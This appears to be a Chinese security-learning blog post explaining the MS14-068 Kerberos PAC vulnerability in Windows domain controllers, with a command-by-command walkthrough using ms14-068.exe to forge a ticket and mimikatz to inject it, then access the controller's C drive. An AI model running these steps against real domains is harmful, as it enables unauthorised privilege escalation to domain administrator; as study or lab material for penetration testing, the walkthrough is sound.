论安全萌新的自我修养

   :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理
  213 随笔 :: 0 文章 :: 15 评论 :: 23万 阅读

MS14-068是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证.。

利用过程:
wmic qfe get hotfixid域控上查看补丁情况 发现没有安装补丁

使用whoami获得普通域成员用户的sid

ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码 运行完成将创建.ccache文件

查看注入票据前的权限 无法列出域控c盘内容,建议使用主机名,ip地址可能会报错

接下来用mm将票据注入到内存
kerberos::purge
系统中也可以清除的 

kerberos::list     
kerberos::ptc 票据文件

klist查看是否成功

连接域控并列出目录

 

posted on   Yangsir34  阅读(473)  评论(0编辑  收藏  举报
编辑推荐:
· 深入理解 Mybatis 分库分表执行原理
· 如何打造一个高并发系统?
· .NET Core GC压缩(compact_phase)底层原理浅谈
· 现代计算机视觉入门之:什么是图片特征编码
· .NET 9 new features-C#13新的锁类型和语义
阅读排行:
· Spring AI + Ollama 实现 deepseek-r1 的API服务和调用
· 《HelloGitHub》第 106 期
· 数据库服务器 SQL Server 版本升级公告
· 深入理解Mybatis分库分表执行原理
· 使用 Dify + LLM 构建精确任务处理应用
点击右上角即可分享
微信分享提示